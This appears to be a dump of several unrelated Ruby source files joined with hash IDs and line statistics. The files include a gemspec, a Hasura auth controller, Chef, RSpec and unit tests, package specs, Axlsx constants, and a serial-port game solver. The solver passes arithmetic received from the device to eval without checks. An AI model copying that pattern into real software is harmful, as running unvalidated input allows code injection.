spec.description = %q{A Ruby wrapper for the Slack Api. Block kit included.}
spec.homepage = "https://github.com/GerryLarios/slack-app-gem"
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/GerryLarios/slack-app-gem"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
# Dependencies
spec.add_runtime_dependency 'httparty', '~> 0.18.1'
end
| 41.25 | 87 | 0.661364 |
e8c69ae8546bc33788410d6b03fa9340a8caf1d6 | 837 | require_dependency "hasura_handler/application_controller"
module HasuraHandler
class AuthHookController < ApplicationController
def get_mode
@headers = clean_headers
authenticate
end
def post_mode
@headers = raw_params['headers'].
to_h.
map{ |k,v| [standardize_header(k), v] }.
to_h
authenticate
end
private
def authenticate
@authenticator = HasuraHandler.
authenticator.
to_s.
constantize.
new(@headers)
if @authenticator.success?
render json: @authenticator.response, status: 200
else
render json: { error: true, message: @authenticator.error_message }, status: 401
end
end
def standardize_header(header)
"HTTP_#{header.to_s.gsub('-', '_').upcase}"
end
end
end
| 20.925 | 88 | 0.630824 |
6ac9aa2fedec2214484c0bc13aac15503c07a8b5 | 763 | execute 'apt-get update' if platform_family?('debian')
splunk_app 'bistro' do
splunk_auth 'admin:notarealpassword'
cookbook_file 'bistro-1.0.2.spl'
checksum '862e2c4422eee93dd50bd93aa73a44045d02cb6232f971ba390a2f1c15bdb79f'
action [:install, :enable]
end
splunk_app 'bistro-disable' do
app_name 'bistro'
splunk_auth 'admin:notarealpassword'
action [:disable, :remove]
end
splunk_app 'sanitycheck' do
remote_directory 'sanitycheck'
splunk_auth 'admin:notarealpassword'
action :install
end
splunk_app 'bistro-remote-file' do
app_name 'bistro-1.0.2'
remote_file 'https://github.com/ampledata/bistro/archive/1.0.2.tar.gz'
splunk_auth 'admin:notarealpassword'
templates ['inputs.conf']
app_dependencies ['ruby']
action :install
end
| 25.433333 | 77 | 0.771953 |
6ae9a1bbdce7d5f538a8a349be601b69a0f78514 | 1,433 | require "shogi_koma/painter"
require "cairo"
class PainterTest < Test::Unit::TestCase
def setup
@painter = ShogiKoma::Painter.new
end
class SetFontTest < self
def test_found
part_of_name = "M"
assert_match(/#{part_of_name}/, @painter.set_font(part_of_name))
end
def test_not_found
part_of_name = "ABCDE12345"
assert_nil(@painter.set_font(part_of_name))
end
end
class DrawTest < self
def test_one_character
assert_nothing_raised_in_draw("A")
end
def test_two_characters
assert_nothing_raised_in_draw("AB")
end
def test_three_characters
assert_nothing_raised_in_draw("ABC")
end
def test_body_color_with_rgb
@painter.set_body_rgb(0.2, 0.2, 0.2)
assert_nothing_raised_in_draw("D")
end
def test_text_color_with_name
@painter.set_text_color(:deep_pink)
assert_nothing_raised_in_draw("E")
end
def test_text_color_with_hex
@painter.set_text_color("#ACE")
assert_nothing_raised_in_draw("G")
end
private
def assert_nothing_raised_in_draw(text)
width = 200
height = 200
assert_nothing_raised do
Cairo::ImageSurface.new(:argb32, width, height) do |surface|
Cairo::Context.new(surface) do |context|
context.scale(width, height)
@painter.draw(context, text)
end
end
end
end
end
end
| 22.390625 | 70 | 0.667132 |
bb266d406e50390afb9371c5a20b772f2d4d252f | 85 | require "airesis_i18n/engine"
require "airesis_i18n/version"
module AiresisI18n
end
| 14.166667 | 30 | 0.835294 |
ff0482067332996a89b61ed85cff872539c4f3b3 | 171 | module Payments
class NotUsersFriendshipError < StandardError
def initialize(msg = I18n.t('api.errors.payments.not_users_friendship'))
super
end
end
end
| 21.375 | 76 | 0.74269 |
7a8a48b62c3c3331b2c0fa2c9719b772b3fe85e3 | 458 | cask 'musescore' do
version '2.0.3.1'
sha256 'a166a21bf6259331a42b3a5ed73cfb69f653095a27a676fbf94a747d98153b29'
# ftp.osuosl.org/pub/musescore was verified as official when first introduced to the cask
url "https://ftp.osuosl.org/pub/musescore/releases/MuseScore-#{version.major_minor_patch}/MuseScore-#{version}.dmg"
name 'MuseScore'
homepage 'https://musescore.org/'
depends_on macos: '>= :lion'
app "MuseScore #{version.major}.app"
end
| 32.714286 | 117 | 0.759825 |
f85422d032aef5a711d8efb024b1855465e1acb5 | 2,027 | require('rspec')
require('word_freq')
describe('String#word_freq') do
it('will return 1 if the word the method is called on is the same as the word given as the argument') do
expect('path'.word_freq('path')).to(eq(1))
end
it('will return 0 if the word the method is called on is not the same as the word given as the argument') do
expect('path'.word_freq('street')).to(eq(0))
end
it('will return 1 if the word occurs once at the beginning of the sentence') do
expect('hello'.word_freq('Hello world')).to(eq(1))
end
it('will return 1 if the word occurs once anywhere in the sentence') do
expect('hello'.word_freq('World hello I am Ian')).to(eq(1))
end
it('will return the number of occurences of the word the method is called on within a sentence without punctuation') do
expect('path'.word_freq('Little red riding hood walked down the path and on that path she met me')).to(eq(2))
end
it('will return the number of occurences of the word the method is called on in a sentence containing punctuation') do
expect('path'.word_freq('Little red riding hood walked down the path, on that path she met a ...')).to(eq(2))
end
it('will return 0 occurences of the word if the method is called on a sentence containing punctuation and not the word') do
expect('path'.word_freq('There she was just walkin\' down the street. Singin\' \'Do wah diddy, diddy, dum diddy do')).to(eq(0))
end
it('will return the number of occurences of a word the method is called on in a sentence containing punctuation, even if it is contained in a contraction') do
expect('won'.word_freq('The camel won\'t stop spitting. Won\'t you ask him to stop? Because of his spitting, the dodgers won.')).to(eq(3))
end
it('will return the number of occurences of a contracted word the method is called on in a sentence containing punctuation') do
expect('won\'t'.word_freq('The camel won\'t stop spitting. Won\'t you ask him to stop? Because of his spitting, the dodgers won.')).to(eq(2))
end
end
| 61.424242 | 160 | 0.71929 |
613dca130a0016ee1b768b675804d0d4cf8aa549 | 851 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "/"
css_dir = "css/generated"
sass_dir = "scss"
images_dir = "img"
javascripts_dir = "js"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.04 | 96 | 0.749706 |
5de980519a553098419ef76e0fb15e46c9363bc3 | 4,005 | Pod::Spec.new do |s|
s.name = 'Parse'
s.version = '1.11.0'
s.license = { :type => 'Commercial', :text => "See https://www.parse.com/about/terms" }
s.homepage = 'https://www.parse.com/'
s.summary = 'Parse is a complete technology stack to power your app\'s backend.'
s.authors = 'Parse'
s.source = { :git => "https://github.com/ParsePlatform/Parse-SDK-iOS-OSX.git", :tag => s.version.to_s }
s.platform = :ios, :osx, :tvos, :watchos
s.ios.deployment_target = '7.0'
s.osx.deployment_target = '10.9'
s.tvos.deployment_target = '9.0'
s.watchos.deployment_target = '2.0'
s.requires_arc = true
s.source_files = 'Parse/*.{h,m}',
'Parse/Internal/**/*.{h,m}'
s.public_header_files = 'Parse/*.h'
s.ios.exclude_files = 'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.osx.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFProduct.{h,m}',
'Parse/PFPurchase.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/Product/**/*.{h,m}',
'Parse/Internal/Purchase/**/*.{h,m}',
'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.tvos.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFPush.{h,m}',
'Parse/PFInstallation.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/Push/**/*.{h,m}',
'Parse/Internal/Installation/Controller/*.{h,m}',
'Parse/Internal/Installation/Constants/*.{h,m}',
'Parse/Internal/Installation/CurrentInstallationController/*.{h,m}',
'Parse/Internal/Installation/PFInstallationPrivate.h',
'Parse/Internal/Commands/PFRESTPushCommand.{h,m}'
s.watchos.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFProduct.{h,m}',
'Parse/PFPurchase.{h,m}',
'Parse/PFPush.{h,m}',
'Parse/PFInstallation.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/PFReachability.{h,m}',
'Parse/Internal/Product/**/*.{h,m}',
'Parse/Internal/Purchase/**/*.{h,m}',
'Parse/Internal/Push/**/*.{h,m}',
'Parse/Internal/Installation/Controller/*.{h,m}',
'Parse/Internal/Installation/Constants/*.{h,m}',
'Parse/Internal/Installation/CurrentInstallationController/*.{h,m}',
'Parse/Internal/Installation/PFInstallationPrivate.h',
'Parse/Internal/Commands/PFRESTPushCommand.{h,m}',
'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.resources = 'Parse/Resources/en.lproj'
s.ios.frameworks = 'AudioToolbox',
'CFNetwork',
'CoreGraphics',
'CoreLocation',
'QuartzCore',
'Security',
'StoreKit',
'SystemConfiguration'
s.ios.weak_frameworks = 'Accounts',
'Social'
s.osx.frameworks = 'ApplicationServices',
'CFNetwork',
'CoreGraphics',
'CoreLocation',
'QuartzCore',
'Security',
'SystemConfiguration'
s.tvos.frameworks = 'CoreLocation',
'StoreKit',
'SystemConfiguration',
'Security'
s.libraries = 'z', 'sqlite3'
s.dependency 'Bolts/Tasks', '~> 1.5'
end
| 46.569767 | 115 | 0.485643 |
d59dbfc32abfe523453e3d67c421c1e4cd5caaba | 47 | module UpdateInBatches
VERSION = "0.0.2"
end
| 11.75 | 22 | 0.723404 |
1a1079fd8a0264e0f66cc61d3ddf3bf6d1c2d7b0 | 966 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
require "minitest/reporters"
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
include ApplicationHelper
# テストユーザーがログイン中の場合にtrueを返す
def is_logged_in?
!session[:user_id].nil?
end
# テストユーザーとしてログインする
def log_in_as(user)
session[:user_id] = user.id
end
end
class ActionDispatch::IntegrationTest
# テストユーザーとしてログインする
def log_in_as(user, password: 'password', remember_me: '1')
post login_path, params: { session: { email: user.email,
password: password,
remember_me: remember_me } }
end
end
| 25.421053 | 82 | 0.674948 |
7a90244a3622c3083ffb62868a03c01b82c38aa1 | 13,578 | module Axlsx
# XML Encoding
ENCODING = "UTF-8".freeze
# spreadsheetML namespace
XML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main".freeze
# content-types namespace
XML_NS_T = "http://schemas.openxmlformats.org/package/2006/content-types".freeze
# extended-properties namespace
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties".freeze
# doc props namespace
APP_NS_VT = "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes".freeze
# core properties namespace
CORE_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties".freeze
# dc elements (core) namespace
CORE_NS_DC = "http://purl.org/dc/elements/1.1/".freeze
# dcmit (core) namespcace
CORE_NS_DCMIT = "http://purl.org/dc/dcmitype/".freeze
# dc terms namespace
CORE_NS_DCT = "http://purl.org/dc/terms/".freeze
# xml schema namespace
CORE_NS_XSI = "http://www.w3.org/2001/XMLSchema-instance".freeze
# Digital signature namespace
DIGITAL_SIGNATURE_NS = "http://schemas.openxmlformats.org/package/2006/digital-signature".freeze
# spreadsheet drawing namespace
XML_NS_XDR = "http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing".freeze
# drawing namespace
XML_NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main".freeze
# chart namespace
XML_NS_C = "http://schemas.openxmlformats.org/drawingml/2006/chart".freeze
# relationships namespace
XML_NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships".freeze
# relationships name space
RELS_R = "http://schemas.openxmlformats.org/package/2006/relationships".freeze
# table rels namespace
TABLE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/table".freeze
# pivot table rels namespace
PIVOT_TABLE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotTable".freeze
# pivot table cache definition namespace
PIVOT_TABLE_CACHE_DEFINITION_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotCacheDefinition".freeze
# workbook rels namespace
WORKBOOK_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument".freeze
# worksheet rels namespace
WORKSHEET_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet".freeze
# app rels namespace
APP_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties".freeze
# core rels namespace
CORE_R = "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties".freeze
# digital signature rels namespace
DIGITAL_SIGNATURE_R = "http://schemas.openxmlformats.org/package/2006/relationships/digital- signature/signature".freeze
# styles rels namespace
STYLES_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles".freeze
# shared strings namespace
SHARED_STRINGS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings".freeze
# drawing rels namespace
DRAWING_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing".freeze
# chart rels namespace
CHART_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart".freeze
# image rels namespace
IMAGE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image".freeze
# hyperlink rels namespace
HYPERLINK_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink".freeze
# comment rels namespace
COMMENT_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments".freeze
# comment relation for nil target
COMMENT_R_NULL = "http://purl.oclc.org/ooxml/officeDocument/relationships/comments".freeze
# vml drawing relation namespace
VML_DRAWING_R = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing'
# VML Drawing content type
VML_DRAWING_CT = "application/vnd.openxmlformats-officedocument.vmlDrawing".freeze
# table content type
TABLE_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.table+xml".freeze
# pivot table content type
PIVOT_TABLE_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.pivotTable+xml".freeze
# pivot table cache definition content type
PIVOT_TABLE_CACHE_DEFINITION_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.pivotCacheDefinition+xml".freeze
# workbook content type
WORKBOOK_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml".freeze
# app content type
APP_CT = "application/vnd.openxmlformats-officedocument.extended-properties+xml".freeze
# rels content type
RELS_CT = "application/vnd.openxmlformats-package.relationships+xml".freeze
# styles content type
STYLES_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml".freeze
# xml content type
XML_CT = "application/xml".freeze
# worksheet content type
WORKSHEET_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml".freeze
# shared strings content type
SHARED_STRINGS_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml".freeze
# core content type
CORE_CT = "application/vnd.openxmlformats-package.core-properties+xml".freeze
# digital signature xml content type
DIGITAL_SIGNATURE_XML_CT = "application/vnd.openxmlformats-package.digital-signature-xmlsignature+xml".freeze
# digital signature origin content type
DIGITAL_SIGNATURE_ORIGIN_CT = "application/vnd.openxmlformats-package.digital-signature-origin".freeze
# digital signature certificate content type
DIGITAL_SIGNATURE_CERTIFICATE_CT = "application/vnd.openxmlformats-package.digital-signature-certificate".freeze
# chart content type
CHART_CT = "application/vnd.openxmlformats-officedocument.drawingml.chart+xml".freeze
# comments content type
COMMENT_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.comments+xml".freeze
# jpeg content type
JPEG_CT = "image/jpeg".freeze
# gif content type
GIF_CT = "image/gif".freeze
# png content type
PNG_CT = "image/png".freeze
# drawing content type
DRAWING_CT = "application/vnd.openxmlformats-officedocument.drawing+xml".freeze
# xml content type extensions
XML_EX = "xml".freeze
# jpeg extension
JPEG_EX = "jpeg".freeze
# gif extension
GIF_EX = "gif".freeze
# png extension
PNG_EX = "png".freeze
# rels content type extension
RELS_EX = "rels".freeze
# workbook part
WORKBOOK_PN = "xl/workbook.xml".freeze
# styles part
STYLES_PN = "styles.xml".freeze
# shared_strings part
SHARED_STRINGS_PN = "sharedStrings.xml".freeze
# app part
APP_PN = "docProps/app.xml".freeze
# core part
CORE_PN = "docProps/core.xml".freeze
# content types part
CONTENT_TYPES_PN = "[Content_Types].xml".freeze
# rels part
RELS_PN = "_rels/.rels".freeze
# workbook rels part
WORKBOOK_RELS_PN = "xl/_rels/workbook.xml.rels".freeze
# worksheet part
WORKSHEET_PN = "worksheets/sheet%d.xml".freeze
# worksheet rels part
WORKSHEET_RELS_PN = "worksheets/_rels/sheet%d.xml.rels".freeze
# drawing part
DRAWING_PN = "drawings/drawing%d.xml".freeze
# drawing rels part
DRAWING_RELS_PN = "drawings/_rels/drawing%d.xml.rels".freeze
# vml drawing part
VML_DRAWING_PN = "drawings/vmlDrawing%d.vml".freeze
# drawing part
TABLE_PN = "tables/table%d.xml".freeze
# pivot table parts
PIVOT_TABLE_PN = "pivotTables/pivotTable%d.xml".freeze
# pivot table cache definition part name
PIVOT_TABLE_CACHE_DEFINITION_PN = "pivotCache/pivotCacheDefinition%d.xml".freeze
# pivot table rels parts
PIVOT_TABLE_RELS_PN = "pivotTables/_rels/pivotTable%d.xml.rels".freeze
# chart part
CHART_PN = "charts/chart%d.xml".freeze
# chart part
IMAGE_PN = "media/image%d.%s".freeze
# comment part
COMMENT_PN = "comments%d.xml".freeze
# location of schema files for validation
SCHEMA_BASE = (File.dirname(__FILE__) + '/../../schema/').freeze
# App validation schema
APP_XSD = (SCHEMA_BASE + "shared-documentPropertiesExtended.xsd").freeze
# core validation schema
CORE_XSD = (SCHEMA_BASE + "opc-coreProperties.xsd").freeze
# content types validation schema
CONTENT_TYPES_XSD = (SCHEMA_BASE + "opc-contentTypes.xsd").freeze
# rels validation schema
RELS_XSD = (SCHEMA_BASE + "opc-relationships.xsd").freeze
# spreadsheetML validation schema
SML_XSD = (SCHEMA_BASE + "sml.xsd").freeze
# drawing validation schema
DRAWING_XSD = (SCHEMA_BASE + "dml-spreadsheetDrawing.xsd").freeze
# number format id for pecentage formatting using the default formatting id.
NUM_FMT_PERCENT = 9
# number format id for date format like 2011/11/13
NUM_FMT_YYYYMMDD = 100
# number format id for time format the creates 2011/11/13 12:23:10
NUM_FMT_YYYYMMDDHHMMSS = 101
# cellXfs id for thin borders around the cell
STYLE_THIN_BORDER = 1
# cellXfs id for default date styling
STYLE_DATE = 2
# error messages RestrictionValidor
ERR_RESTRICTION = "Invalid Data: %s. %s must be one of %s.".freeze
# error message DataTypeValidator
ERR_TYPE = "Invalid Data %s for %s. must be %s.".freeze
# error message for RegexValidator
ERR_REGEX = "Invalid Data. %s does not match %s.".freeze
# error message for RangeValidator
ERR_RANGE = "Invalid Data. %s must be between %s and %s, (inclusive:%s) you gave: %s".freeze
# error message for sheets that use a name which is longer than 31 bytes
ERR_SHEET_NAME_TOO_LONG = "Your worksheet name '%s' is too long. Worksheet names must be 31 characters (bytes) or less".freeze
# error message for sheets that use a name which include invalid characters
ERR_SHEET_NAME_CHARACTER_FORBIDDEN = "Your worksheet name '%s' contains a character which is not allowed by MS Excel and will cause repair warnings. Please change the name of your sheet.".freeze
# error message for duplicate sheet names
ERR_DUPLICATE_SHEET_NAME = "There is already a worksheet in this workbook named '%s'. Please use a unique name".freeze
# error message when user does not provide color and or style options for border in Style#add_sytle
ERR_INVALID_BORDER_OPTIONS = "border hash must include both style and color. e.g. :border => { :color => 'FF000000', :style => :thin }. You provided: %s".freeze
# error message for invalid border id reference
ERR_INVALID_BORDER_ID = "The border id you specified (%s) does not exist. Please add a border with Style#add_style before referencing its index.".freeze
# error message for invalid angles
ERR_ANGLE = "Angles must be a value between -90 and 90. You provided: %s".freeze
# error message for non 'integerish' value
ERR_INTEGERISH = "You value must be, or be castable via to_i, an Integer. You provided %s".freeze
# Regex to match forbidden control characters
# The following will be automatically stripped from worksheets.
#
# x00 Null
# x01 Start Of Heading
# x02 Start Of Text
# x03End Of Text
# x04 End Of Transmission
# x05 Enquiry
# x06 Acknowledge
# x07 Bell
# x08 Backspace
# x0B Line Tabulation
# x0C Form Feed
# x0E Shift Out
# x0F Shift In
# x10 Data Link Escape
# x11 Device Control One
# x12 Device Control Two
# x13 Device Control Three
# x14 Device Control Four
# x15 Negative Acknowledge
# x16 Synchronous Idle
# x17 End Of Transmission Block
# x18 Cancel
# x19 End Of Medium
# x1A Substitute
# x1B Escape
# x1C Information Separator Four
# x1D Information Separator Three
# x1E Information Separator Two
# x1F Information Separator One
#
# The following are not dealt with.
# If you have this in your data, expect excel to blow up!
#
# x7F Delete
# x80 Control 0080
# x81 Control 0081
# x82 Break Permitted Here
# x83 No Break Here
# x84 Control 0084
# x85 Next Line (Nel)
# x86 Start Of Selected Area
# x87 End Of Selected Area
# x88 Character Tabulation Set
# x89 Character Tabulation With Justification
# x8A Line Tabulation Set
# x8B Partial Line Forward
# x8C Partial Line Backward
# x8D Reverse Line Feed
# x8E Single Shift Two
# x8F Single Shift Three
# x90 Device Control String
# x91 Private Use One
# x92 Private Use Two
# x93 Set Transmit State
# x94 Cancel Character
# x95 Message Waiting
# x96 Start Of Guarded Area
# x97 End Of Guarded Area
# x98 Start Of String
# x99 Control 0099
# x9A Single Character Introducer
# x9B Control Sequence Introducer
# x9C String Terminator
# x9D Operating System Command
# x9E Privacy Message
# x9F Application Program Command
#
# The following are allowed:
#
# x0A Line Feed (Lf)
# x0D Carriage Return (Cr)
# x09 Character Tabulation
# @see http://www.codetable.net/asciikeycodes
pattern = "\x0-\x08\x0B\x0C\x0E-\x1F"
pattern = pattern.respond_to?(:encode) ? pattern.encode('UTF-8') : pattern
# The regular expression used to remove control characters from worksheets
CONTROL_CHARS = pattern.freeze
# ISO 8601 date recognition
ISO_8601_REGEX = /\A(-?(?:[1-9][0-9]*)?[0-9]{4})-(1[0-2]|0[1-9])-(3[0-1]|0[1-9]|[1-2][0-9])T(2[0-3]|[0-1][0-9]):([0-5][0-9]):([0-5][0-9])(\.[0-9]+)?(Z|[+-](?:2[0-3]|[0-1][0-9]):[0-5][0-9])?\Z/.freeze
# FLOAT recognition
FLOAT_REGEX = /\A[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?\Z/.freeze
# Numeric recognition
NUMERIC_REGEX = /\A[+-]?\d+?\Z/.freeze
end
| 34.030075 | 201 | 0.745986 |
91a6ad1f178d64cec805a8f72e5b71d6e3b83d10 | 205 | class RemoveTwitterHandleFromCongressMembers < ActiveRecord::Migration[5.1]
def change
remove_columns :congress_members, :twitter_handle, :twitter_picture_url, :member_profile_response_api
end
end
| 34.166667 | 105 | 0.834146 |
01cbba229deefe037f24828dd34d4b9f6a77d8a6 | 2,568 | #simplest ruby program to read from arduino serial,
#using the SerialPort gem
#(http://rubygems.org/gems/serialport)
require "serialport"
#params for serial port
port_str = "COM3" #may be different for you
baud_rate = 115200
data_bits = 8
stop_bits = 1
parity = SerialPort::NONE
$port = SerialPort.new(port_str, baud_rate, data_bits, stop_bits, parity)
def game0(ques)
if ques
morse = {
".-"=> "A",
"-..."=> "B",
"-.-."=> "C",
"-.."=> "D",
"."=> "E",
"..-."=> "F",
"--."=> "G",
"...."=> "H",
".."=> "I",
".---"=> "J",
"-.-"=> "K",
".-.."=> "L",
"--"=> "M",
"-."=> "N",
"---"=> "O",
".--."=> "P",
"--.-"=> "Q",
".-."=> "R",
"..."=> "S",
"-"=> "T",
"..-"=> "U",
"...-"=> "V",
".--"=> "W",
"-..-"=> "X",
"-.--"=> "Y",
"--.."=> "Z",
"-----"=> "0",
".----"=> "1",
"..---"=> "2",
"...--"=> "3",
"....-"=> "4",
"....."=> "5",
"-...."=> "6",
"--..."=> "7",
"---.."=> "8",
"----."=> "9"
}
answer = []
ques.split(' ').each {|q| answer << morse[q]}
$port.write("#{answer.join('')}\n")
$port.flush()
end
end
def game1(ques)
if ques
prng = Random.new
prng = prng.rand(4)
answer = ['w', 's', 'a', 'd']
$port.write("#{answer[prng]}\n")
$port.flush()
end
end
def game2(ques)
if ques
answer = eval(ques)
$port.write("#{answer}\n")
$port.flush()
end
end
choice = '1'
sleep 2 # wait machine
while true do
$port.read_timeout = 20
while (line = $port.readline) do
puts line
line = line[0..-2] if line
if line == 'Nano$ enter your choice:'
$port.write("#{choice}\n")
$port.flush()
end
if line == 'Nano$ finish'
$port.close()
break
end
if choice == '0'
if line == 'Nano$ activate Morse'
ques = $port.readline
puts ques
ques = ques[6..-2]
line = $port.readline
puts line
game0(ques)
end
end
if choice == '1'
sleep 2 if line == 'Nano$ send [a] to move left' # wait generate map
if line == 'Nano$ show map'
game1(line)
end
end
if choice == '2'
if line == 'Nano$ activate Calculator'
ques = $port.readline
puts ques
ques = ques[6..-5]
line = $port.readline
puts line
game2(ques)
end
end
end
break
end
| 20.380952 | 74 | 0.408879 |
e2b8898d05180b37059b42f93f1611ed2806cb37 | 823 | module Spree
module ParanoiaDeprecations
def paranoia_destroy
Spree::Deprecation.warn <<-WARN.strip_heredoc, caller
Calling #destroy (or #paranoia_destroy) on a #{self.class} currently performs a soft-destroy using the paranoia gem.
In Solidus 3.0, paranoia will be removed, and this will perform a HARD destroy instead. To continue soft-deleting, use #discard instead.
WARN
super
end
def paranoia_delete
Spree::Deprecation.warn <<-WARN.strip_heredoc, caller
Calling #delete (or #paranoia_delete) on a #{self.class} currently performs a soft-destroy using the paranoia gem.
In Solidus 3.0, paranoia will be removed, and this will perform a HARD destroy instead. To continue soft-deleting, use #discard instead.
WARN
super
end
end
end
| 41.15 | 144 | 0.714459 |
62e0d711bb9b5c6ee6919500ee46e39eb9007549 | 4,606 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::Integrations::Jira::IssuesFinder do
let_it_be(:project, refind: true) { create(:project) }
let_it_be(:jira_service, reload: true) { create(:jira_service, project: project) }
let(:params) { {} }
let(:service) { described_class.new(project, params) }
before do
stub_licensed_features(jira_issues_integration: true)
end
describe '#execute' do
subject(:issues) { service.execute }
context 'when jira service integration does not have project_key' do
it 'raises error' do
expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::IntegrationError, 'Jira project key is not configured')
end
end
context 'when jira service integration is not active' do
before do
jira_service.update!(active: false)
end
it 'raises error' do
expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::IntegrationError, 'Jira service not configured.')
end
end
context 'when jira service integration has project_key' do
let(:params) { {} }
let(:client) { double(options: { site: 'https://jira.example.com' }) }
before do
jira_service.update!(project_key: 'TEST')
expect_next_instance_of(Jira::Requests::Issues::ListService) do |instance|
expect(instance).to receive(:client).at_least(:once).and_return(client)
end
end
context 'when Jira API request fails' do
before do
expect(client).to receive(:get).and_raise(Timeout::Error)
end
it 'raises error', :aggregate_failures do
expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::RequestError)
end
end
context 'when Jira API request succeeds' do
before do
expect(client).to receive(:get).and_return(
{
"total" => 375,
"startAt" => 0,
"issues" => [{ "key" => 'TEST-1' }, { "key" => 'TEST-2' }]
}
)
end
it 'return service response with issues', :aggregate_failures do
expect(issues.size).to eq 2
expect(service.total_count).to eq 375
expect(issues.map(&:key)).to eq(%w[TEST-1 TEST-2])
end
context 'when sorting' do
shared_examples 'maps sort values' do
it do
expect(::Jira::JqlBuilderService).to receive(:new)
.with(jira_service.project_key, expected_sort_values)
.and_call_original
subject
end
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'created_date' } }
let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'created_desc' } }
let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'created_asc' } }
let(:expected_sort_values) { { sort: 'created', sort_direction: 'ASC' } }
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'updated_desc' } }
let(:expected_sort_values) { { sort: 'updated', sort_direction: 'DESC' } }
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'updated_asc' } }
let(:expected_sort_values) { { sort: 'updated', sort_direction: 'ASC' } }
end
it_behaves_like 'maps sort values' do
let(:params) { { sort: 'unknown_sort' } }
let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
end
end
context 'when pagination params used' do
let(:params) { { page: '10', per_page: '20' } }
it 'passes them to JqlBuilderService' do
expect(::Jira::JqlBuilderService).to receive(:new)
.with(jira_service.project_key, include({ page: '10', per_page: '20' }))
.and_call_original
subject
end
end
end
end
context 'when jira_issues_integration licensed feature is not available' do
it 'exits early and returns no issues' do
stub_licensed_features(jira_issues_integration: false)
expect(issues.size).to eq 0
expect(service.total_count).to be_nil
end
end
end
end
| 33.136691 | 141 | 0.594225 |
6288673ca68ced24731eade827ec4ab6a9c51b4f | 1,710 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
